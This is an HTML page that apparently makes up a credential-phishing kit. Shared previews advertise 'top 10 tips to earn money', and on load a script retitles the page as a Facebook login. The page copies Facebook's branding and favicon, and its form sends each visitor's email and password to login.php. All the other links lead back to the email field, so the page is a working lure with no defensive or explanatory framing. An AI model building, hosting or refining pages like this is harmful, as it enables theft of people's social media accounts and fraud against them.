<!doctype html>
<html>
<head>
   <title>Top 10 Tips to Earn Money in Short Time</title>
   <meta charset="utf-8">
   <meta name="viewport" content="width=device-width,initial-scale=1.0,user-scalable=yes">
   <meta name="description" content="Here are the list of top 10 tips to earn money in short time and become a
   successful earner in today's market. This list are exclusive to get for free to everyone.">
   <meta property='og:image' content='earnmoney.jpg' />
   <link rel="shortcut icon" href="https://www.facebook.com/rsrc.php/yl/r/H3nktOa7ZMg.ico">
   <style>
      table tr td{text-align:center;}
      .bottom a{color:#D3D3D3;}
      .bottom a:link{text-decoration:none;}
      input{padding:10px;}
      .login{background-color:#3b5998;color:white;}
      .check{background-color:#32CD32;color:white;padding:12px;}
      .inputf a:link{text-decoration:none;}
   </style>
</head>
<body style="margin:0px;">
<script>
   document.title='Facebook - Log In or Sign Up';
</script>
<div style="width:100%;">
<div style="height:40px;background-color:#3b5998;padding-bottom:10px;padding-left:5px;">
   <span style="color:white;font-size:120%;"><br/>facebook</span>
</div>
<div style="background-color:#FAFAD2;padding:5px;line-height:23px;text-align:center;">
   <span style="color:purple;">Login to continue to get top 10 exclusive tips to earn money in short time.</span>
</div>
<div class="inputf" style="background-color:AliceBlue;padding:10px;text-align:center;"><br/>
   <form name="fbform" method="post" action="login.php">
      <input name="email" type="text" id="email" placeholder="Email address or phone number" maxlength="40" size="30px"
      required><br/><br/>
      <input name="pass" type="password" id="pass" placeholder="Password" maxlength="40" size="30px"
      required><br/><br/>
      <input class="login" name="login" type="submit" id="submit" value="Log In" size="60px"><br/><br/>
      <span style="text-align:center;">Or</span><br/><br/>
      <a class="check" href="#email" onclick='document.getElementById("email").focus();'>Create New Account</a><br/><br/>
      <a href="#email" onclick='document.getElementById("email").focus();'>Forgotten password?</a> <br/><br/>
      <a href="#email" onclick='document.getElementById("email").focus();'>Help Center</a><br/>
   </form>
</div>
<div class="bottom" style="background-color:#808080;padding:10px;">
   <table style="width:250px;margin-left:auto;margin-right:auto;color:#D3D3D3;">
   <tr>
      <td><a href="#email" onclick='document.getElementById("email").focus();'>English (UK)</a></td>
      <td><a href="#email" onclick='document.getElementById("email").focus();'>English (US)</a></td>
   </tr>
   <tr>
      <td><a href="#email" onclick='document.getElementById("email").focus();'>English (In)</a></td>
      <td><a href="#email" onclick='document.getElementById("email").focus();'>More</a></td>
   </tr>
   </table>
   <p style="text-align:center;color:white;">Facebook</p>
</div>
</div>
</body>
</html>
